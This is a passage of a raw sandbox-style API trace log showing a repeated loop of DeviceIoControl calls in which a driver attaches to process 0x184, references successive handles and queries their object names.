(in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.583] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.583] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.583] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.583] PsAcquireProcessExitSynchronization () returned 0x0 [0135.583] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.583] ObReferenceObjectByHandle (in: Handle=0x580, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018b4d60, HandleInformation=0x0) returned 0x0 [0135.584] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.584] PsReleaseProcessExitSynchronization () returned 0x2 [0135.584] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.584] ObQueryNameString (in: Object=0xfffff8a0018b4d60, ObjectNameInfo=0xfffffa80027f3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027f3044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.584] ObfDereferenceObject (Object=0xfffff8a0018b4d60) returned 0x1 [0135.584] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.584] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.584] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.584] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.584] PsAcquireProcessExitSynchronization () returned 0x0 [0135.584] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.584] ObReferenceObjectByHandle (in: Handle=0x590, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018aee60, HandleInformation=0x0) returned 0x0 [0135.584] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.584] PsReleaseProcessExitSynchronization () returned 0x2 [0135.584] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.584] ObQueryNameString (in: Object=0xfffff8a0018aee60, ObjectNameInfo=0xfffffa800281f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281f044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.584] ObfDereferenceObject (Object=0xfffff8a0018aee60) returned 0x1 [0135.584] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.584] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.584] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.584] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.584] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.584] PsAcquireProcessExitSynchronization () returned 0x0 [0135.584] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.585] ObReferenceObjectByHandle (in: Handle=0x5a0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018bc450, HandleInformation=0x0) returned 0x0 [0135.585] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.585] PsReleaseProcessExitSynchronization () returned 0x2 [0135.585] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.585] ObQueryNameString (in: Object=0xfffff8a0018bc450, ObjectNameInfo=0xfffffa800284b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284b044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.585] ObfDereferenceObject (Object=0xfffff8a0018bc450) returned 0x1 [0135.585] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.585] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.585] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.585] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.585] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.585] PsAcquireProcessExitSynchronization () returned 0x0 [0135.585] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.585] ObReferenceObjectByHandle (in: Handle=0x5b0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018c2eb0, HandleInformation=0x0) returned 0x0 [0135.585] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.585] PsReleaseProcessExitSynchronization () returned 0x2 [0135.585] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.585] ObQueryNameString (in: Object=0xfffff8a0018c2eb0, ObjectNameInfo=0xfffffa800284c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284c044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.585] ObfDereferenceObject (Object=0xfffff8a0018c2eb0) returned 0x1 [0135.585] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.585] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.586] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.586] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.586] PsAcquireProcessExitSynchronization () returned 0x0 [0135.586] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.586] ObReferenceObjectByHandle (in: Handle=0x5c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018c2820, HandleInformation=0x0) returned 0x0 [0135.586] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.586] PsReleaseProcessExitSynchronization () returned 0x2 [0135.586] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.586] ObQueryNameString (in: Object=0xfffff8a0018c2820, ObjectNameInfo=0xfffffa800284d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284d044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.586] ObfDereferenceObject (Object=0xfffff8a0018c2820) returned 0x1 [0135.586] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.586] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.586] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.586] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.586] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.586] PsAcquireProcessExitSynchronization () returned 0x0 [0135.586] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.586] ObReferenceObjectByHandle (in: Handle=0x5d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018c3700, HandleInformation=0x0) returned 0x0 [0135.586] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.586] PsReleaseProcessExitSynchronization () returned 0x2 [0135.586] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.587] ObQueryNameString (in: Object=0xfffff8a0018c3700, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.587] ObfDereferenceObject (Object=0xfffff8a0018c3700) returned 0x1 [0135.587] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.587] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.587] PsAcquireProcessExitSynchronization () returned 0x0 [0135.587] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.587] ObReferenceObjectByHandle (in: Handle=0x5e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018c9b30, HandleInformation=0x0) returned 0x0 [0135.587] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.587] PsReleaseProcessExitSynchronization () returned 0x2 [0135.587] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.587] ObQueryNameString (in: Object=0xfffff8a0018c9b30, ObjectNameInfo=0xfffffa80025f17c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025f17c4, ReturnLength=0xfffff88005163550) returned 0x0 [0135.587] ObfDereferenceObject (Object=0xfffff8a0018c9b30) returned 0x1 [0135.587] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.587] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.587] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.587] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.588] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.588] PsAcquireProcessExitSynchronization () returned 0x0 [0135.588] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.588] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018bfa90, HandleInformation=0x0) returned 0x0 [0135.588] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.588] PsReleaseProcessExitSynchronization () returned 0x2 [0135.588] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.588] ObQueryNameString (in: Object=0xfffff8a0018bfa90, ObjectNameInfo=0xfffffa800284b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800284b044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.588] ObfDereferenceObject (Object=0xfffff8a0018bfa90) returned 0x1 [0135.588] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.588] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.588] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.588] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.588] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.588] PsAcquireProcessExitSynchronization () returned 0x0 [0135.588] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.588] ObReferenceObjectByHandle (in: Handle=0x600, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018cc680, HandleInformation=0x0) returned 0x0 [0135.588] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.588] PsReleaseProcessExitSynchronization () returned 0x2 [0135.588] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.588] ObQueryNameString (in: Object=0xfffff8a0018cc680, ObjectNameInfo=0xfffffa800281f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800281f044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.588] ObfDereferenceObject (Object=0xfffff8a0018cc680) returned 0x1 [0135.588] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.589] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.589] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.589] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.589] PsAcquireProcessExitSynchronization () returned 0x0 [0135.589] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.589] ObReferenceObjectByHandle (in: Handle=0x610, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00186efc0, HandleInformation=0x0) returned 0x0 [0135.589] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.589] PsReleaseProcessExitSynchronization () returned 0x2 [0135.589] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.589] ObQueryNameString (in: Object=0xfffff8a00186efc0, ObjectNameInfo=0xfffffa80027f3044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027f3044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.589] ObfDereferenceObject (Object=0xfffff8a00186efc0) returned 0x1 [0135.589] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.589] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.589] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.589] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.589] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.589] PsAcquireProcessExitSynchronization () returned 0x0 [0135.589] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.589] ObReferenceObjectByHandle (in: Handle=0x620, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018d8520, HandleInformation=0x0) returned 0x0 [0135.589] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.589] PsReleaseProcessExitSynchronization () returned 0x2 [0135.589] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.589] ObQueryNameString (in: Object=0xfffff8a0018d8520, ObjectNameInfo=0xfffffa80027e0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80027e0044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.589] ObfDereferenceObject (Object=0xfffff8a0018d8520) returned 0x1 [0135.589] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.590] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.590] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.590] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.590] PsAcquireProcessExitSynchronization () returned 0x0 [0135.590] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.590] ObReferenceObjectByHandle (in: Handle=0x630, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018da480, HandleInformation=0x0) returned 0x0 [0135.590] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.590] PsReleaseProcessExitSynchronization () returned 0x2 [0135.590] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.590] ObQueryNameString (in: Object=0xfffff8a0018da480, ObjectNameInfo=0xfffffa8002600044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002600044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.590] ObfDereferenceObject (Object=0xfffff8a0018da480) returned 0x1 [0135.590] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.590] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.590] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.590] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.590] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.590] PsAcquireProcessExitSynchronization () returned 0x0 [0135.590] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.590] ObReferenceObjectByHandle (in: Handle=0x640, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018dad60, HandleInformation=0x0) returned 0x0 [0135.590] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.590] PsReleaseProcessExitSynchronization () returned 0x2 [0135.590] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.590] ObQueryNameString (in: Object=0xfffff8a0018dad60, ObjectNameInfo=0xfffffa80025ae044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80025ae044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.590] ObfDereferenceObject (Object=0xfffff8a0018dad60) returned 0x1 [0135.590] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.591] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.591] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.591] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.591] PsAcquireProcessExitSynchronization () returned 0x0 [0135.591] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.591] ObReferenceObjectByHandle (in: Handle=0x650, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018e41a0, HandleInformation=0x0) returned 0x0 [0135.591] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.591] PsReleaseProcessExitSynchronization () returned 0x2 [0135.591] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.591] ObQueryNameString (in: Object=0xfffff8a0018e41a0, ObjectNameInfo=0xfffffa80022b0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022b0044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.591] ObfDereferenceObject (Object=0xfffff8a0018e41a0) returned 0x1 [0135.591] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.591] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.591] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.591] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.591] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.591] PsAcquireProcessExitSynchronization () returned 0x0 [0135.591] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0135.591] ObReferenceObjectByHandle (in: Handle=0x660, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0018e17f0, HandleInformation=0x0) returned 0x0 [0135.592] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0135.592] PsReleaseProcessExitSynchronization () returned 0x2 [0135.592] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x154 [0135.592] ObQueryNameString (in: Object=0xfffff8a0018e17f0, ObjectNameInfo=0xfffffa8002640044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002640044, ReturnLength=0xfffff88005163550) returned 0x0 [0135.592] ObfDereferenceObject (Object=0xfffff8a0018e17f0) returned 0x1 [0135.592] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0135.592] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0135.592] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0135.592] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0135.592] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0135.592] PsAcquireProcessExitSynchronization () returned 0x0 [0135.592] KeStackAttachProcess (in: 